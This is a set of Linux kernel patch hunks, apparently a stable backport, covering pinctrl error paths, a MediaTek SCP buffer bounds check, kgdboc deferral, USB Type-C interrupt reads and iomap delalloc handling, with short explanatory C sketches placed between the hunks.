+@@ -226,18 +227,25 @@ static int pinctrl_register_one_pin(struct pinctrl_dev *pctldev,
+ 	} else {
+ 		pindesc->name = kasprintf(GFP_KERNEL, "PIN%u", pin->number);
+ 		if (!pindesc->name) {
+-			kfree(pindesc);
+-			return -ENOMEM;
++			error = -ENOMEM;
++			goto failed;
+ 		}
+ 		pindesc->dynamic_name = true;
+ 	}
+ 
+ 	pindesc->drv_data = pin->drv_data;
+ 
+-	radix_tree_insert(&pctldev->pin_desc_tree, pin->number, pindesc);
++	error = radix_tree_insert(&pctldev->pin_desc_tree, pin->number, pindesc);
++	if (error)
++		goto failed;
++
+ 	pr_debug("registered pin %d (%s) on %s\n",
+ 		 pin->number, pindesc->name, pctldev->desc->name);
+ 	return 0;
++
++failed:
++	kfree(pindesc);
++	return error;
+ }
+ 
+ static int pinctrl_register_pins(struct pinctrl_dev *pctldev,
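
The pinctrl hunk above stops ignoring the return value of radix_tree_insert() and funnels both failure paths through a single "failed" label that frees the descriptor. A standalone sketch of the goto-based unwind pattern (a hypothetical allocation stands in for the pin descriptor, and tree_insert() for radix_tree_insert()):

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for radix_tree_insert(); may fail with -ENOMEM. */
static int tree_insert(void *item)
{
	(void)item;
	return 0;
}

static int register_one(const char *name)
{
	char *desc;
	int error;

	desc = strdup(name);
	if (!desc)
		return -ENOMEM;

	error = tree_insert(desc);
	if (error)
		goto failed;	/* every late failure unwinds here */

	printf("registered %s\n", desc);
	return 0;	/* desc is now owned by the tree */

failed:
	free(desc);
	return error;
}

int main(void)
{
	return register_one("PIN42") ? EXIT_FAILURE : EXIT_SUCCESS;
}
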
+diff --git a/drivers/remoteproc/mtk_scp.c b/drivers/remoteproc/mtk_scp.c
+index d421a2ccaa1ea..ffec5299b5c1d 100644
+--- a/drivers/remoteproc/mtk_scp.c
++++ b/drivers/remoteproc/mtk_scp.c
+@@ -126,7 +126,7 @@ static int scp_elf_read_ipi_buf_addr(struct mtk_scp *scp,
+ static int scp_ipi_init(struct mtk_scp *scp, const struct firmware *fw)
+ {
+ 	int ret;
+-	size_t offset;
++	size_t buf_sz, offset;
+ 
+ 	/* read the ipi buf addr from FW itself first */
+ 	ret = scp_elf_read_ipi_buf_addr(scp, fw, &offset);
+@@ -138,6 +138,14 @@ static int scp_ipi_init(struct mtk_scp *scp, const struct firmware *fw)
+ 	}
+ 	dev_info(scp->dev, "IPI buf addr %#010zx\n", offset);
+ 
++	/* Make sure IPI buffer fits in the L2TCM range assigned to this core */
++	buf_sz = sizeof(*scp->recv_buf) + sizeof(*scp->send_buf);
++
++	if (scp->sram_size < buf_sz + offset) {
++		dev_err(scp->dev, "IPI buffer does not fit in SRAM.\n");
++		return -EOVERFLOW;
++	}
++
+ 	scp->recv_buf = (struct mtk_share_obj __iomem *)
+ 			(scp->sram_base + offset);
+ 	scp->send_buf = (struct mtk_share_obj __iomem *)
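
The mtk_scp hunk above validates that the firmware-provided IPI buffer offset plus the buffer size fits inside the SRAM region before forming pointers into it. A standalone sketch of that bounds check (hypothetical sizes):

#include <errno.h>
#include <stddef.h>
#include <stdio.h>

/* Reject offsets that would place the buffers past the end of SRAM. */
static int check_ipi_buf(size_t sram_size, size_t offset, size_t buf_sz)
{
	if (sram_size < buf_sz + offset)
		return -EOVERFLOW;
	return 0;
}

int main(void)
{
	size_t sram_size = 64 * 1024;
	size_t buf_sz = 2 * 288;	/* hypothetical recv + send sizes */

	printf("offset 0x0100: %d\n", check_ipi_buf(sram_size, 0x0100, buf_sz));
	printf("offset 0xfff0: %d\n", check_ipi_buf(sram_size, 0xfff0, buf_sz));
	return 0;
}
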
+diff --git a/drivers/tty/serial/kgdboc.c b/drivers/tty/serial/kgdboc.c
+index 7aa37be3216a5..86433e3c3409a 100644
+--- a/drivers/tty/serial/kgdboc.c
++++ b/drivers/tty/serial/kgdboc.c
+@@ -19,6 +19,7 @@
+ #include <linux/console.h>
+ #include <linux/vt_kern.h>
+ #include <linux/input.h>
++#include <linux/irq_work.h>
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include <linux/serial_core.h>
+@@ -48,6 +49,25 @@ static struct kgdb_io		kgdboc_earlycon_io_ops;
+ static int                      (*earlycon_orig_exit)(struct console *con);
+ #endif /* IS_BUILTIN(CONFIG_KGDB_SERIAL_CONSOLE) */
+ 
++/*
++ * When we leave the debug trap handler we need to reset the keyboard status
++ * (since the original keyboard state gets partially clobbered by kdb use of
++ * the keyboard).
++ *
++ * The path to deliver the reset is somewhat circuitous.
++ *
++ * To deliver the reset we register an input handler, reset the keyboard and
++ * then deregister the input handler. However, to get this done right, we do
++ * have to carefully manage the calling context because we can only register
++ * input handlers from task context.
++ *
++ * In particular we need to trigger the action from the debug trap handler with
++ * all its NMI and/or NMI-like oddities. To solve this the kgdboc trap exit code
++ * (the "post_exception" callback) uses irq_work_queue(), which is NMI-safe, to
++ * schedule a callback from a hardirq context. From there we have to defer the
++ * work again, this time using schedule_work(), to get a callback using the
++ * system workqueue, which runs in task context.
++ */
+ #ifdef CONFIG_KDB_KEYBOARD
+ static int kgdboc_reset_connect(struct input_handler *handler,
+ 				struct input_dev *dev,
+@@ -99,10 +119,17 @@ static void kgdboc_restore_input_helper(struct work_struct *dummy)
+ 
+ static DECLARE_WORK(kgdboc_restore_input_work, kgdboc_restore_input_helper);
+ 
++static void kgdboc_queue_restore_input_helper(struct irq_work *unused)
++{
++	schedule_work(&kgdboc_restore_input_work);
++}
++
++static DEFINE_IRQ_WORK(kgdboc_restore_input_irq_work, kgdboc_queue_restore_input_helper);
++
+ static void kgdboc_restore_input(void)
+ {
+ 	if (likely(system_state == SYSTEM_RUNNING))
+-		schedule_work(&kgdboc_restore_input_work);
++		irq_work_queue(&kgdboc_restore_input_irq_work);
+ }
+ 
+ static int kgdboc_register_kbd(char **cptr)
+@@ -133,6 +160,7 @@ static void kgdboc_unregister_kbd(void)
+ 			i--;
+ 		}
+ 	}
++	irq_work_sync(&kgdboc_restore_input_irq_work);
+ 	flush_work(&kgdboc_restore_input_work);
+ }
+ #else /* ! CONFIG_KDB_KEYBOARD */
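
The kgdboc comment above describes a two-stage deferral: the NMI-like trap context may only queue NMI-safe irq_work, whose hardirq callback in turn queues regular work, so the input-handler registration finally runs in task context. A very loose userspace analogy of chaining two deferral stages (plain function queues stand in for irq_work and the system workqueue; this is not the kernel API):

#include <stdio.h>

typedef void (*callback_t)(void);

static callback_t hardirq_queue[4];
static callback_t task_queue[4];
static int hardirq_n, task_n;

static void irq_work_queue_sim(callback_t cb) { hardirq_queue[hardirq_n++] = cb; }
static void schedule_work_sim(callback_t cb)  { task_queue[task_n++] = cb; }

static void restore_input_helper(void)
{
	printf("task context: keyboard state restored\n");
}

/* Stage 2: runs in (simulated) hardirq context, defers again. */
static void queue_restore_input_helper(void)
{
	schedule_work_sim(restore_input_helper);
}

/* Stage 1: the only thing safe to do from the trap handler. */
static void trap_exit(void)
{
	irq_work_queue_sim(queue_restore_input_helper);
}

int main(void)
{
	trap_exit();
	while (hardirq_n)		/* drain "hardirq" stage */
		hardirq_queue[--hardirq_n]();
	while (task_n)			/* drain "task" stage */
		task_queue[--task_n]();
	return 0;
}
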
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 2d7ac92ce9b84..c72c6f8ec2c88 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -1708,7 +1708,6 @@ static int __dwc3_gadget_get_frame(struct dwc3 *dwc)
+  */
+ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool interrupt)
+ {
+-	struct dwc3 *dwc = dep->dwc;
+ 	struct dwc3_gadget_ep_cmd_params params;
+ 	u32 cmd;
+ 	int ret;
+@@ -1733,8 +1732,7 @@ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool int
+ 	dep->resource_index = 0;
+ 
+ 	if (!interrupt) {
+-		if (!DWC3_IP_IS(DWC3) || DWC3_VER_IS_PRIOR(DWC3, 310A))
+-			mdelay(1);
++		mdelay(1);
+ 		dep->flags &= ~DWC3_EP_TRANSFER_STARTED;
+ 	} else if (!ret) {
+ 		dep->flags |= DWC3_EP_END_TRANSFER_PENDING;
+diff --git a/drivers/usb/typec/tipd/core.c b/drivers/usb/typec/tipd/core.c
+index 195c9c16f817f..e804db927d5cf 100644
+--- a/drivers/usb/typec/tipd/core.c
++++ b/drivers/usb/typec/tipd/core.c
+@@ -24,6 +24,7 @@
+ #define TPS_REG_MODE			0x03
+ #define TPS_REG_CMD1			0x08
+ #define TPS_REG_DATA1			0x09
++#define TPS_REG_VERSION			0x0F
+ #define TPS_REG_INT_EVENT1		0x14
+ #define TPS_REG_INT_EVENT2		0x15
+ #define TPS_REG_INT_MASK1		0x16
+@@ -518,49 +519,67 @@ static irqreturn_t cd321x_interrupt(int irq, void *data)
+ 
+ static irqreturn_t tps6598x_interrupt(int irq, void *data)
+ {
++	int intev_len = TPS_65981_2_6_INTEVENT_LEN;
+ 	struct tps6598x *tps = data;
+-	u64 event1 = 0;
+-	u64 event2 = 0;
++	u64 event1[2] = { };
++	u64 event2[2] = { };
++	u32 version;
+ 	u32 status;
+ 	int ret;
+ 
+ 	mutex_lock(&tps->lock);
+ 
+-	ret = tps6598x_read64(tps, TPS_REG_INT_EVENT1, &event1);
+-	ret |= tps6598x_read64(tps, TPS_REG_INT_EVENT2, &event2);
++	ret = tps6598x_read32(tps, TPS_REG_VERSION, &version);
++	if (ret)
++		dev_warn(tps->dev, "%s: failed to read version (%d)\n",
++			 __func__, ret);
++
++	if (TPS_VERSION_HW_VERSION(version) == TPS_VERSION_HW_65987_8_DH ||
++	    TPS_VERSION_HW_VERSION(version) == TPS_VERSION_HW_65987_8_DK)
++		intev_len = TPS_65987_8_INTEVENT_LEN;
++
++	ret = tps6598x_block_read(tps, TPS_REG_INT_EVENT1, event1, intev_len);
+ 	if (ret) {
+-		dev_err(tps->dev, "%s: failed to read events\n", __func__);
++		dev_err(tps->dev, "%s: failed to read event1\n", __func__);
+ 		goto err_unlock;
+ 	}
+-	trace_tps6598x_irq(event1, event2);
++	ret = tps6598x_block_read(tps, TPS_REG_INT_EVENT2, event2, intev_len);
++	if (ret) {
++		dev_err(tps->dev, "%s: failed to read event2\n", __func__);
++		goto err_unlock;
++	}
++	trace_tps6598x_irq(event1[0], event2[0]);
+ 
+-	if (!(event1 | event2))
++	if (!(event1[0] | event1[1] | event2[0] | event2[1]))
+ 		goto err_unlock;
+ 
+ 	if (!tps6598x_read_status(tps, &status))
+ 		goto err_clear_ints;
+ 
+-	if ((event1 | event2) & TPS_REG_INT_POWER_STATUS_UPDATE)
++	if ((event1[0] | event2[0]) & TPS_REG_INT_POWER_STATUS_UPDATE)
+ 		if (!tps6598x_read_power_status(tps))
+ 			goto err_clear_ints;
+ 
+-	if ((event1 | event2) & TPS_REG_INT_DATA_STATUS_UPDATE)
++	if ((event1[0] | event2[0]) & TPS_REG_INT_DATA_STATUS_UPDATE)
+ 		if (!tps6598x_read_data_status(tps))
+ 			goto err_clear_ints;
+ 
+ 	/* Handle plug insert or removal */
+-	if ((event1 | event2) & TPS_REG_INT_PLUG_EVENT)
++	if ((event1[0] | event2[0]) & TPS_REG_INT_PLUG_EVENT)
+ 		tps6598x_handle_plug_event(tps, status);
+ 
+ err_clear_ints:
+-	tps6598x_write64(tps, TPS_REG_INT_CLEAR1, event1);
+-	tps6598x_write64(tps, TPS_REG_INT_CLEAR2, event2);
++	tps6598x_block_write(tps, TPS_REG_INT_CLEAR1, event1, intev_len);
++	tps6598x_block_write(tps, TPS_REG_INT_CLEAR2, event2, intev_len);
+ 
+ err_unlock:
+ 	mutex_unlock(&tps->lock);
+ 
+-	if (event1 | event2)
++	if (event1[0] | event1[1] | event2[0] | event2[1])
+ 		return IRQ_HANDLED;
++
+ 	return IRQ_NONE;
+ }
+ 
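
The tipd hunk above sizes the event-register reads by hardware version (8 bytes on TPS65981/2/6, 11 on TPS65987/8) and then treats the event flags as a two-word array, so every test must OR all words together. A standalone sketch of the any-bit-set test over a multi-word event buffer (version codes as defined in the tps6598x.h hunk below; everything else is illustrative):

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define HW_65981_2_6_LEN	8
#define HW_65987_8_LEN		11

static int intevent_len(uint8_t hw_version)
{
	/* 0xF7 and 0xF9 mirror the DH/DK hardware IDs from the header. */
	if (hw_version == 0xF7 || hw_version == 0xF9)
		return HW_65987_8_LEN;
	return HW_65981_2_6_LEN;
}

static bool any_event(const uint64_t ev1[2], const uint64_t ev2[2])
{
	/* An 11-byte read spills into the second word; check both. */
	return (ev1[0] | ev1[1] | ev2[0] | ev2[1]) != 0;
}

int main(void)
{
	uint64_t ev1[2] = { 0, 0x4 };	/* flag only in the high word */
	uint64_t ev2[2] = { 0, 0 };

	printf("len(0xF7) = %d\n", intevent_len(0xF7));
	printf("any_event = %d\n", any_event(ev1, ev2));
	return 0;
}
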
+diff --git a/drivers/usb/typec/tipd/tps6598x.h b/drivers/usb/typec/tipd/tps6598x.h
+index 527857549d699..1fc3cc8ad199a 100644
+--- a/drivers/usb/typec/tipd/tps6598x.h
++++ b/drivers/usb/typec/tipd/tps6598x.h
+@@ -199,4 +199,15 @@
+ #define TPS_DATA_STATUS_DP_SPEC_PIN_ASSIGNMENT_A    BIT(2)
+ #define TPS_DATA_STATUS_DP_SPEC_PIN_ASSIGNMENT_B    (BIT(2) | BIT(1))
+ 
++/* Version Register */
++#define TPS_VERSION_HW_VERSION_MASK            GENMASK(31, 24)
++#define TPS_VERSION_HW_VERSION(x)              TPS_FIELD_GET(TPS_VERSION_HW_VERSION_MASK, (x))
++#define TPS_VERSION_HW_65981_2_6               0x00
++#define TPS_VERSION_HW_65987_8_DH              0xF7
++#define TPS_VERSION_HW_65987_8_DK              0xF9
++
++/* Int Event Register length */
++#define TPS_65981_2_6_INTEVENT_LEN             8
++#define TPS_65987_8_INTEVENT_LEN               11
++
+ #endif /* __TPS6598X_H__ */
+diff --git a/drivers/usb/typec/ucsi/displayport.c b/drivers/usb/typec/ucsi/displayport.c
+index 73cd5bf350472..2431febc46151 100644
+--- a/drivers/usb/typec/ucsi/displayport.c
++++ b/drivers/usb/typec/ucsi/displayport.c
+@@ -275,8 +275,6 @@ static void ucsi_displayport_work(struct work_struct *work)
+ 	struct ucsi_dp *dp = container_of(work, struct ucsi_dp, work);
+ 	int ret;
+ 
+-	mutex_lock(&dp->con->lock);
+-
+ 	ret = typec_altmode_vdm(dp->alt, dp->header,
+ 				dp->vdo_data, dp->vdo_size);
+ 	if (ret)
+@@ -285,8 +283,6 @@ static void ucsi_displayport_work(struct work_struct *work)
+ 	dp->vdo_data = NULL;
+ 	dp->vdo_size = 0;
+ 	dp->header = 0;
+-
+-	mutex_unlock(&dp->con->lock);
+ }
+ 
+ void ucsi_displayport_remove_partner(struct typec_altmode *alt)
+diff --git a/fs/iomap/buffered-io.c b/fs/iomap/buffered-io.c
+index a0a4d8de82cad..dac1a5c110c0e 100644
+--- a/fs/iomap/buffered-io.c
++++ b/fs/iomap/buffered-io.c
+@@ -579,7 +579,7 @@ static int iomap_write_begin_inline(const struct iomap_iter *iter,
+ 	return iomap_read_inline_data(iter, folio);
+ }
+ 
+-static int iomap_write_begin(const struct iomap_iter *iter, loff_t pos,
++static int iomap_write_begin(struct iomap_iter *iter, loff_t pos,
+ 		size_t len, struct folio **foliop)
+ {
+ 	const struct iomap_page_ops *page_ops = iter->iomap.page_ops;
+@@ -613,6 +613,27 @@ static int iomap_write_begin(const struct iomap_iter *iter, loff_t pos,
+ 		status = (iter->flags & IOMAP_NOWAIT) ? -EAGAIN : -ENOMEM;
+ 		goto out_no_page;
+ 	}
++
++	/*
++	 * Now we have a locked folio, before we do anything with it we need to
++	 * check that the iomap we have cached is not stale. The inode extent
++	 * mapping can change due to concurrent IO in flight (e.g.
++	 * IOMAP_UNWRITTEN state can change and memory reclaim could have
++	 * reclaimed a previously partially written page at this index after IO
++	 * completion before this write reaches this file offset) and hence we
++	 * could do the wrong thing here (zero a page range incorrectly or fail
++	 * to zero) and corrupt data.
++	 */
++	if (page_ops && page_ops->iomap_valid) {
++		bool iomap_valid = page_ops->iomap_valid(iter->inode,
++							&iter->iomap);
++		if (!iomap_valid) {
++			iter->iomap.flags |= IOMAP_F_STALE;
++			status = 0;
++			goto out_unlock;
++		}
++	}
++
+ 	if (pos + len > folio_pos(folio) + folio_size(folio))
+ 		len = folio_pos(folio) + folio_size(folio) - pos;
+ 
+@@ -768,6 +789,8 @@ static loff_t iomap_write_iter(struct iomap_iter *iter, struct iov_iter *i)
+ 		status = iomap_write_begin(iter, pos, bytes, &folio);
+ 		if (unlikely(status))
+ 			break;
++		if (iter->iomap.flags & IOMAP_F_STALE)
++			break;
+ 
+ 		page = folio_file_page(folio, pos >> PAGE_SHIFT);
+ 		if (mapping_writably_mapped(mapping))
+@@ -827,6 +850,231 @@ iomap_file_buffered_write(struct kiocb *iocb, struct iov_iter *i,
+ }
+ EXPORT_SYMBOL_GPL(iomap_file_buffered_write);
+ 
++/*
++ * Scan the data range passed to us for dirty page cache folios. If we find a
++ * dirty folio, punch out the preceeding range and update the offset from which
++ * the next punch will start from.
++ *
++ * We can punch out storage reservations under clean pages because they either
++ * contain data that has been written back - in which case the delalloc punch
++ * over that range is a no-op - or they were instantiated by read faults, in
++ * which case they contain zeroes and we can remove the delalloc backing range
++ * and any new writes to those pages will do the normal hole filling operation...
++ *
++ * This makes the logic simple: we need to keep the delalloc extents only over
++ * the dirty ranges of the page cache.
++ *
++ * This function uses [start_byte, end_byte) intervals (i.e. open ended) to
++ * simplify range iterations.
++ */
++static int iomap_write_delalloc_scan(struct inode *inode,
++		loff_t *punch_start_byte, loff_t start_byte, loff_t end_byte,
++		int (*punch)(struct inode *inode, loff_t offset, loff_t length))
++{
++	while (start_byte < end_byte) {
++		struct folio	*folio;
++
++		/* grab locked page */
++		folio = filemap_lock_folio(inode->i_mapping,
++				start_byte >> PAGE_SHIFT);
++		if (!folio) {
++			start_byte = ALIGN_DOWN(start_byte, PAGE_SIZE) +
++					PAGE_SIZE;
++			continue;
++		}
++
++		/* if dirty, punch up to offset */
++		if (folio_test_dirty(folio)) {
++			if (start_byte > *punch_start_byte) {
++				int	error;
++
++				error = punch(inode, *punch_start_byte,
++						start_byte - *punch_start_byte);
++				if (error) {
++					folio_unlock(folio);
++					folio_put(folio);
++					return error;
++				}
++			}
++
++			/*
++			 * Make sure the next punch start is correctly bound to
++			 * the end of this data range, not the end of the folio.
++			 */
++			*punch_start_byte = min_t(loff_t, end_byte,
++					folio_next_index(folio) << PAGE_SHIFT);
++		}
++
++		/* move offset to start of next folio in range */
++		start_byte = folio_next_index(folio) << PAGE_SHIFT;
++		folio_unlock(folio);
++		folio_put(folio);
++	}
++	return 0;
++}
++
++/*
++ * Punch out all the delalloc blocks in the range given except for those that
++ * have dirty data still pending in the page cache - those are going to be
++ * written and so must still retain the delalloc backing for writeback.
++ *
++ * As we are scanning the page cache for data, we don't need to reimplement the
++ * wheel - mapping_seek_hole_data() does exactly what we need to identify the
++ * start and end of data ranges correctly even for sub-folio block sizes. This
++ * byte range based iteration is especially convenient because it means we
++ * don't have to care about variable size folios, nor where the start or end of
++ * the data range lies within a folio, whether they lie within the same folio,
++ * or even whether there are multiple discontiguous data ranges within the folio.
++ *
++ * It should be noted that mapping_seek_hole_data() is not aware of EOF, and so
++ * can return data ranges that exist in the cache beyond EOF. e.g. a page fault
++ * spanning EOF will initialise the post-EOF data to zeroes and mark it up to
++ * date. A write page fault can then mark it dirty. If we then fail a write()
++ * beyond EOF into that up to date cached range, we allocate a delalloc block
++ * beyond EOF and then have to punch it out. Because the range is up to date,
++ * mapping_seek_hole_data() will return it, and we will skip the punch because
++ * the folio is dirty. This is incorrect - we always need to punch out delalloc
++ * beyond EOF in this case as writeback will never write back and convert that
++ * delalloc block beyond EOF. Hence we limit the cached data scan range to EOF,
++ * resulting in always punching out the range from the EOF to the end of the
++ * range the iomap spans.
++ *
++ * Intervals are of the form [start_byte, end_byte) (i.e. open ended) because it
++ * matches the intervals returned by mapping_seek_hole_data(). i.e. SEEK_DATA
++ * returns the start of a data range (start_byte), and SEEK_HOLE(start_byte)
++ * returns the end of the data range (data_end). Using closed intervals would
++ * require sprinkling this code with magic "+ 1" and "- 1" arithmetic and expose
++ * the code to subtle off-by-one bugs....
++ */
++static int iomap_write_delalloc_release(struct inode *inode,
++		loff_t start_byte, loff_t end_byte,
++		int (*punch)(struct inode *inode, loff_t pos, loff_t length))
++{
++	loff_t punch_start_byte = start_byte;
++	loff_t scan_end_byte = min(i_size_read(inode), end_byte);
++	int error = 0;
++
++	/*
++	 * Lock the mapping to avoid races with page faults re-instantiating
++	 * folios and dirtying them via ->page_mkwrite whilst we walk the
++	 * cache and perform delalloc extent removal. Failing to do this can
++	 * leave dirty pages with no space reservation in the cache.
++	 */
++	filemap_invalidate_lock(inode->i_mapping);
++	while (start_byte < scan_end_byte) {
++		loff_t		data_end;
++
++		start_byte = mapping_seek_hole_data(inode->i_mapping,
++				start_byte, scan_end_byte, SEEK_DATA);
++		/*
++		 * If there is no more data to scan, all that is left is to
++		 * punch out the remaining range.
++		 */
++		if (start_byte == -ENXIO || start_byte == scan_end_byte)
++			break;
++		if (start_byte < 0) {
++			error = start_byte;
++			goto out_unlock;
++		}
++		WARN_ON_ONCE(start_byte < punch_start_byte);
++		WARN_ON_ONCE(start_byte > scan_end_byte);
++
++		/*
++		 * We find the end of this contiguous cached data range by
++		 * seeking from start_byte to the beginning of the next hole.
++		 */
++		data_end = mapping_seek_hole_data(inode->i_mapping, start_byte,
++				scan_end_byte, SEEK_HOLE);
++		if (data_end < 0) {
++			error = data_end;
++			goto out_unlock;
++		}
++		WARN_ON_ONCE(data_end <= start_byte);
++		WARN_ON_ONCE(data_end > scan_end_byte);
++
++		error = iomap_write_delalloc_scan(inode, &punch_start_byte,
++				start_byte, data_end, punch);
++		if (error)
++			goto out_unlock;
++
++		/* The next data search starts at the end of this one. */
++		start_byte = data_end;
++	}
++
++	if (punch_start_byte < end_byte)
++		error = punch(inode, punch_start_byte,
++				end_byte - punch_start_byte);
++out_unlock:
++	filemap_invalidate_unlock(inode->i_mapping);
++	return error;
++}
++
++/*
++ * When a short write occurs, the filesystem may need to remove reserved space
++ * that was allocated in ->iomap_begin from its ->iomap_end method. For
++ * filesystems that use delayed allocation, we need to punch out delalloc
++ * extents from the range that are not dirty in the page cache. As the write can
++ * race with page faults, there can be dirty pages over the delalloc extent
++ * outside the range of a short write but still within the delalloc extent
++ * allocated for this iomap.
++ *
++ * This function uses [start_byte, end_byte) intervals (i.e. open ended) to
++ * simplify range iterations.
++ *
++ * The punch() callback *must* only punch delalloc extents in the range passed
++ * to it. It must skip over all other types of extents in the range and leave
++ * them completely unchanged. It must do this punch atomically with respect to
++ * other extent modifications.
++ *
++ * The punch() callback may be called with a folio locked to prevent writeback
++ * extent allocation racing at the edge of the range we are currently punching.
++ * The locked folio may or may not cover the range being punched, so it is not
++ * safe for the punch() callback to lock folios itself.
++ *
++ * Lock order is:
++ *
++ * inode->i_rwsem (shared or exclusive)
++ *   inode->i_mapping->invalidate_lock (exclusive)
++ *     folio_lock()
++ *       ->punch
++ *         internal filesystem allocation lock
++ */
++int iomap_file_buffered_write_punch_delalloc(struct inode *inode,
++		struct iomap *iomap, loff_t pos, loff_t length,
++		ssize_t written,
++		int (*punch)(struct inode *inode, loff_t pos, loff_t length))
++{
++	loff_t			start_byte;
++	loff_t			end_byte;
++	int			blocksize = i_blocksize(inode);
++
++	if (iomap->type != IOMAP_DELALLOC)
++		return 0;
++
++	/* If we didn't reserve the blocks, we're not allowed to punch them. */
++	if (!(iomap->flags & IOMAP_F_NEW))
++		return 0;
++
++	/*
++	 * start_byte refers to the first unused block after a short write. If
++	 * nothing was written, round offset down to point at the first block in
++	 * the range.
++	 */
++	if (unlikely(!written))
++		start_byte = round_down(pos, blocksize);
++	else
++		start_byte = round_up(pos + written, blocksize);
++	end_byte = round_up(pos + length, blocksize);
++
++	/* Nothing to do if we've written the entire delalloc extent */
++	if (start_byte >= end_byte)
++		return 0;
++
++	return iomap_write_delalloc_release(inode, start_byte, end_byte,
++					punch);
++}
++EXPORT_SYMBOL_GPL(iomap_file_buffered_write_punch_delalloc);
++
+ static loff_t iomap_unshare_iter(struct iomap_iter *iter)
+ {
+ 	struct iomap *iomap = &iter->iomap;
+@@ -851,6 +1099,8 @@ static loff_t iomap_unshare_iter(struct iomap_iter *iter)
+ 		status = iomap_write_begin(iter, pos, bytes, &folio);
+ 		if (unlikely(status))
+ 			return status;
++		if (iter->iomap.flags & IOMAP_F_STALE)
++			break;
+ 
+ 		status = iomap_write_end(iter, pos, bytes, bytes, folio);
+ 		if (WARN_ON_ONCE(status == 0))
+@@ -906,6 +1156,8 @@ static loff_t iomap_zero_iter(struct iomap_iter *iter, bool *did_zero)
+ 		status = iomap_write_begin(iter, pos, bytes, &folio);
+ 		if (status)
+ 			return status;
++		if (iter->iomap.flags & IOMAP_F_STALE)
++			break;
+ 
+ 		offset = offset_in_folio(folio, pos);
+ 		if (bytes > folio_size(folio) - offset)
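
The new iomap_write_delalloc_scan()/release() logic above walks the byte range as [start_byte, end_byte) intervals, punching out delalloc reservations under clean pages while leaving dirty pages (which still need the reservation for writeback) untouched. A standalone sketch of that scan over a toy page-dirty bitmap (hypothetical punch callback, fixed 4 KiB pages, start assumed page-aligned):

#include <stdbool.h>
#include <stdio.h>

#define PAGE_SZ 4096UL

/* Toy page cache: which pages in the range carry dirty data. */
static bool page_dirty(unsigned long index)
{
	return index == 2 || index == 3;	/* pages 2-3 are dirty */
}

/* Hypothetical punch callback: would remove delalloc backing here. */
static void punch(unsigned long start_byte, unsigned long end_byte)
{
	printf("punch [%lu, %lu)\n", start_byte, end_byte);
}

static void delalloc_release(unsigned long start_byte, unsigned long end_byte)
{
	unsigned long punch_start = start_byte;

	for (unsigned long b = start_byte; b < end_byte; b += PAGE_SZ) {
		if (!page_dirty(b / PAGE_SZ))
			continue;
		/* Dirty page: punch everything clean before it... */
		if (b > punch_start)
			punch(punch_start, b);
		/* ...and resume punching after it. */
		punch_start = b + PAGE_SZ;
	}
	if (punch_start < end_byte)
		punch(punch_start, end_byte);
}

int main(void)
{
	delalloc_release(0, 6 * PAGE_SZ);	/* punches [0,2p) and [4p,6p) */
	return 0;
}
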
+diff --git a/fs/iomap/iter.c b/fs/iomap/iter.c
+index a1c7592d2aded..79a0614eaab77 100644
+--- a/fs/iomap/iter.c
++++ b/fs/iomap/iter.c
+@@ -7,12 +7,28 @@
+ #include <linux/iomap.h>
+ #include "trace.h"
+ 
++/*
++ * Advance to the next range we need to map.
++ *
++ * If the iomap is marked IOMAP_F_STALE, it means the existing map was not fully
++ * processed - it was aborted because the extent the iomap spanned may have been
++ * changed during the operation. In this case, the iteration behaviour is to
++ * remap the unprocessed range of the iter, and that means we may need to remap
++ * even when we've made no progress (i.e. iter->processed = 0). Hence the
++ * "finished iterating" case needs to distinguish between
++ * (processed = 0) meaning we are done and (processed = 0 && stale) meaning we
++ * need to remap the entire remaining range.
++ */
+ static inline int iomap_iter_advance(struct iomap_iter *iter)
+ {
++	bool stale = iter->iomap.flags & IOMAP_F_STALE;
++
+ 	/* handle the previous iteration (if any) */
+ 	if (iter->iomap.length) {
+-		if (iter->processed <= 0)
++		if (iter->processed < 0)
+ 			return iter->processed;
++		if (!iter->processed && !stale)
++			return 0;
+ 		if (WARN_ON_ONCE(iter->processed > iomap_length(iter)))
+ 			return -EIO;
+ 		iter->pos += iter->processed;
+@@ -33,6 +49,7 @@ static inline void iomap_iter_done(struct iomap_iter *iter)
+ 	WARN_ON_ONCE(iter->iomap.offset > iter->pos);
+ 	WARN_ON_ONCE(iter->iomap.length == 0);
+ 	WARN_ON_ONCE(iter->iomap.offset + iter->iomap.length <= iter->pos);
++	WARN_ON_ONCE(iter->iomap.flags & IOMAP_F_STALE);
+ 
+ 	trace_iomap_iter_dstmap(iter->inode, &iter->iomap);
+ 	if (iter->srcmap.type != IOMAP_HOLE)
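
The iter.c change above teaches iomap_iter_advance() that zero progress plus IOMAP_F_STALE means "remap the same range", not "done". A standalone sketch of an iterator loop with that three-way decision (hypothetical flag and iterator struct, not the iomap types):

#include <stdbool.h>
#include <stdio.h>

struct iter {
	long pos, len;		/* remaining range */
	long processed;		/* bytes handled this pass */
	bool stale;		/* mapping changed under us */
};

/* Returns true if another mapping pass is needed. */
static bool iter_advance(struct iter *it)
{
	if (it->processed < 0)
		return false;			/* hard error */
	if (it->processed == 0 && !it->stale)
		return false;			/* genuinely finished */

	/* Consume progress; a stale pass may consume nothing. */
	it->pos += it->processed;
	it->len -= it->processed;
	it->processed = 0;
	it->stale = false;
	return it->len > 0;
}

int main(void)
{
	struct iter it = { .pos = 0, .len = 8192 };

	it.processed = 4096;			/* normal progress */
	printf("continue=%d pos=%ld\n", iter_advance(&it), it.pos);

	it.processed = 0;			/* aborted on a stale map */
	it.stale = true;
	printf("continue=%d pos=%ld\n", iter_advance(&it), it.pos);
	return 0;
}
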
+diff --git a/fs/nfs/callback.c b/fs/nfs/callback.c
+index 456af7d230cf1..46a0a2d6962e1 100644
+--- a/fs/nfs/callback.c
++++ b/fs/nfs/callback.c
+@@ -80,9 +80,6 @@ nfs4_callback_svc(void *vrqstp)
+ 	set_freezable();
+ 
+ 	while (!kthread_freezable_should_stop(NULL)) {
+-
+-		if (signal_pending(current))
+-			flush_signals(current);
+ 		/*
+ 		 * Listen for a request on the socket
+ 		 */
